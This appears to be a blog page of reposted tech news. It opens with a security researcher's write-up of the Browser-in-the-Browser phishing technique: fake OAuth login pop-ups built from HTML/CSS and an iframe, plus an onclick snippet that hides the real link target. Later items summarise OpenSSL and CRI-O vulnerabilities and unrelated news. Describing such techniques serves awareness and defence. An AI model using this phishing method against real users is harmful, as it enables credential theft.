Quite often when we authenticate to a website via Google, Microsoft, Apple etc. we’re provided a pop-up window that asks us to authenticate. The image below shows the window that appears when someone attempts to login to Canva using their Google account.

Replicating The Window

Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and its basically indistinguishable. The image below shows the fake window compared with the real window. Very few people would notice the slight differences between the two.

JavaScript can be easily used to make the window appear on a link or button click, on the page loading etc. And of course you can make the window appear in a visually appealing manner through animations available in libraries such as JQuery.

Demo

Custom URL on-hover

Hovering over a URL to determine if it’s legitimate is not very effective when JavaScript is permitted. HTML for a link generally looks like this:
<a href="https://gmail.com">Google</a>
If an onclick event that returns false is added, then hovering over the link will continue to show the website in the href attribute but when the link is clicked then the href attribute is ignored. We can use this knowledge to make the pop-up window appear more realistic.
<a href="https://gmail.com" onclick="return launchWindow();">Google</a>

function launchWindow(){
    // Launch the fake authentication window
    return false; // This will make sure the href attribute is ignored
}
Available Templates

I’ve created templates for the following OS and browser:

Windows – Chrome (Light & Dark Mode)

Mac OSX – Chrome (Light & Dark Mode)

The templates are available on my Github here.

Conclusion

With this technique we are now able to up our phishing game. The target user would still need to land on your website for the pop-up window to be displayed. But once landed on the attacker-owned website, the user will be at ease as they type their credentials away on what appears to be the legitimate website (because the trustworthy URL says so).

Source: Browser In The Browser (BITB) Attack | mr.d0x

High-Severity DoS Vulnerability Patched in OpenSSL

Posted on March 21, 2022 by Robin Edgar

The flaw, tracked as CVE-2022-0778, was reported to the OpenSSL Project by Google vulnerability researcher Tavis Ormandy.

The security hole affects OpenSSL versions 1.0.2, 1.1.1 and 3.0, and it has been fixed with the release of versions 1.0.2zd (for premium support customers), 1.1.1n and 3.0.2. Version 1.1.0 is also impacted, but it’s no longer supported and will not receive a patch.

Exploitation of the vulnerability is possible in certain situations, and it can lead to a DoS attack against a process that parses externally supplied certificates.

“The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli,” the OpenSSL Project explained in its advisory. “Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form.”

“It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters,” the advisory reads.

Source: High-Severity DoS Vulnerability Patched in OpenSSL | SecurityWeek.Com

Kubernetes container runtime CRI-O has make-me-root flaw

Posted on March 21, 2022 by Robin Edgar

A vulnerability in the container runtime engine CRI-O can be exploited by a rogue user to gain root-level access on a host.

In a Kubernetes environment powered by CRI-O, the security hole can be used by a miscreant to move through a cluster as an administrator, install malware, and cause other chaos.

CrowdStrike’s threat research team discovered the privilege-escalation flaw in CRI-O version 1.19. The bug, tracked as CVE-2022-0811 and more creatively dubbed cr8escape, received a severity score of 8.8 out of 10.

CrowdStrike privately disclosed the vulnerability, and CRI-O’s developers today released a fix while recommending immediate patching. Besides Kubernetes, other software and platforms that depend on or use CRI-O – these include OpenShift and Oracle Container Engine for Kubernetes – may also be vulnerable, CrowdStrike warned.

Each Kubernetes node includes a container runtime such as CRI-O. Among other tasks, the container runtime allows containerized apps to safely share each node’s underlying Linux kernel and other resources. As part of this, Linux ensures that when one container alters a kernel setting, this change isn’t reflected in other containers or on the host as a whole, thus keeping the containers suitably isolated from each other and the underlying platform, CrowdStrike explained.

“Some parameters are namespaced and can therefore be set in a single container without impacting the system at large,” the threat researchers wrote. “Kubernetes and the container runtimes it drives allow pods to update these ‘safe’ kernel settings while blocking access to others.”

And herein lies the security flaw: CRI-O introduced a bug that allows attackers to bypass these safeguards and set kernel parameters. “Due to the addition of sysctl support in version 1.19, [the pinns utility] will now blindly set any kernel parameters it’s passed without validation,” the threat researchers explained.

This means that anyone who can deploy a pod on a cluster using the CRI-O runtime can “abuse the kernel.core_pattern parameter to achieve container escape and arbitrary code execution as root on any node in the cluster,” CrowdStrike continued.

[…]

Source: Kubernetes container runtime CRI-O has make-me-root flaw

Microsoft PowerToys – customise your windows experience

Posted on March 11, 2022 by Robin Edgar

Microsoft PowerToys is a set of utilities for power users to tune and streamline their Windows experience for greater productivity.

Always on Top

Always on Top enables you to pin windows on top of all other windows with a quick key shortcut (⊞ Win+Ctrl+T).

PowerToys Awake

PowerToys Awake is designed to keep a computer awake without having to manage its power & sleep settings. This behavior can be helpful when running time-consuming tasks, ensuring that the computer does not go to sleep or turns off its screens.

Color Picker

ColorPicker is a system-wide color picking utility activated with Win+Shift+C. Pick colors from any currently running application, the picker automatically copies the color into your clipboard in a set format. Color Picker also contains an editor that shows a history of previously picked colors, allows you to fine-tune the selected color and to copy different string representations. This code is based on Martin Chrzan’s Color Picker.

FancyZones

FancyZones is a window manager that makes it easy to create complex window layouts and quickly position windows into those layouts.

File Explorer add-ons

File Explorer add-ons enable preview pane rendering in File Explorer to display SVG icons (.svg), Markdown (.md) and PDF file previews. To enable the preview pane, select the “View” tab in File Explorer, then select “Preview Pane”.

Image Resizer

Image Resizer is a Windows Shell extension for quickly resizing images. With a simple right click from File Explorer, resize one or many images instantly. This code is based on Brice Lambson’s Image Resizer.

Keyboard Manager

Keyboard Manager allows you to customize the keyboard to be more productive by remapping keys and creating your own keyboard shortcuts. This PowerToy requires Windows 10 1903 (build 18362) or later.

Mouse utilities

Mouse utilities add functionality to enhance your mouse and cursor. With Find My Mouse, quickly locate your mouse’s position with a spotlight that focuses on your cursor. This feature is based on source code developed by Raymond Chen.

PowerRename

PowerRename enables you to perform bulk renaming, searching and replacing file names. It includes advanced features, such as using regular expressions, targeting specific file types, previewing expected results, and the ability to undo changes. This code is based on Chris Davis’s SmartRename.

PowerToys Run

PowerToys Run can help you search and launch your app instantly – just press the shortcut Alt+Space and start typing. It is open source and modular for additional plugins. Window Walker is now included as well. This PowerToy requires Windows 10 1903 (build 18362) or later.

Shortcut Guide

Windows key shortcut guide appears when a user presses ⊞ Win+Shift+/ (or as we like to think, ⊞ Win+?) and shows the available shortcuts for the current state of the desktop. You can also change this setting and press and hold ⊞ Win.

Video Conference Mute

Video Conference Mute is a quick way to globally “mute” both your microphone and camera using ⊞ Win+Shift+Q while on a conference call, regardless of the application that currently has focus. This requires Windows 10 1903 (build 18362) or later.

Source: Microsoft PowerToys | Microsoft Docs

Something good from the war: Russia Says Its Businesses Can Use Patents From Anyone In ‘Unfriendly’ Countries

Posted on March 11, 2022 by Robin Edgar

Russia has effectively legalized patent theft from anyone affiliated with countries “unfriendly” to it, declaring that unauthorized use will not be compensated. The Washington Post reports: The decree, issued this week, illustrates the economic war waged around Russia’s invasion of Ukraine, as the West levies sanctions and pulls away from Russia’s huge oil and gas industry. Russian officials have also raised the possibility of lifting restrictions on some trademarks, according to state media, which could allow continued use of brands such as McDonald’s that are withdrawing from Russia in droves. The effect of losing patent protections will vary by company, experts say, depending on whether they have a valuable patent in Russia. The U.S. government has long warned of intellectual property rights violations in the country; last year Russia was among nine nations on a “priority watch list” for alleged failures to protect intellectual property. Now Russian entities could not be sued for damages if they use certain patents without permission.

The patent decree and any further lifting of intellectual property protections could affect Western investment in Russia well beyond any de-escalation of the war in Ukraine, said Josh Gerben, an intellectual property lawyer in Washington. Firms that already saw risks in Russian business would have more reason to worry. “It’s just another example of how [Putin] has forever changed the relationship that Russia will have with the world,” Gerben said. Russia’s decree removes protections for patent holders who are registered in hostile countries, do business in them or hold their nationality.

The Kremlin has not issued any decree lifting protections on trademarks. But Russia’s Ministry of Economic Development said last week that authorities are considering “removing restrictions on the use of intellectual property contained in certain goods whose supply to Russia is restricted,” according to Russian state news outlet Tass, and that potential measures could affect inventions, computer programs and trademarks. The ministry said the measures would “mitigate the impact on the market of supply chain breaks, as well as shortages of goods and services that have arisen due to the new sanctions of western countries,” Tass stated. Gerben said a similar decree on trademarks would pave the way for Russian companies to exploit American brand names that have halted their business in Russia. He gave a hypothetical involving McDonald’s, one of the latest global giants to suspend operations in Russia under public pressure.

Source: Russia Says Its Businesses Can Steal Patents From Anyone In ‘Unfriendly’ Countries – Slashdot

Considering that patents are bad for innovation, make customers bleed and basically empower laziness, this should be an interesting experiment in skyrocketing Russian technologies

Android will soon let you archive apps to save space

Posted on March 11, 2022 by Robin Edgar

[…]

Google announced today it’s working on a new feature it estimates will reduce the space some apps take up by approximately 60 percent. Best of all, your personal data won’t be affected. The feature is called app archiving and will arrive later this year. Rather than uninstalling an app completely, it instead temporarily removes some parts of it and generates a new type of Android Package known as an archived APK. That package preserves your data until the moment you restore the app to its former form.

“Once launched, archiving will deliver great benefits to both users and developers. Instead of uninstalling an app, users would be able to ‘archive’ it – free up space temporarily and be able to re-activate the app quickly and easily,” the company said. “Developers can benefit from fewer uninstalls and substantially lower friction to pick back up with their favorite apps.”

[…]

Source: Android will soon let you archive apps to save space | Engadget

HBO hit with class action lawsuit for allegedly sharing subscriber data with Facebook

Posted on March 11, 2022 by Robin Edgar

HBO is facing a class action lawsuit over allegations that it gave subscribers’ viewing history to Facebook without proper permission, Variety has reported. The suit accuses HBO of providing Facebook with customer lists, allowing the social network to match viewing habits with their profiles.

It further alleges that HBO knows Facebook can combine the data because HBO is a major Facebook advertiser — and Facebook can then use that information to retarget ads to its subscribers. Since HBO never received proper customer consent to do this, it allegedly violated the 1988 Video Privacy Protection Act (VPPA), according to the lawsuit.

HBO, like other sites, discloses to users that it (and partners) use cookies to deliver personalized ads. However, the VPPA requires separate consent from users to share their video viewing history. “A standard privacy policy will not suffice,” according to the suit.

Other streaming providers have been hit with similar claims, and TikTok recently agreed to pay a $92 million settlement for (in part) violating the VPPA. In another case, however, a judge ruled in 2015 that Hulu didn’t knowingly share data with Facebook that could establish an individual’s viewing history. The law firm involved in the HBO suit previously won a $50 million settlement with Hearst after alleging that it violated Michigan privacy laws by selling subscriber data.

Source: HBO hit with class action lawsuit for allegedly sharing subscriber data with Facebook | Engadget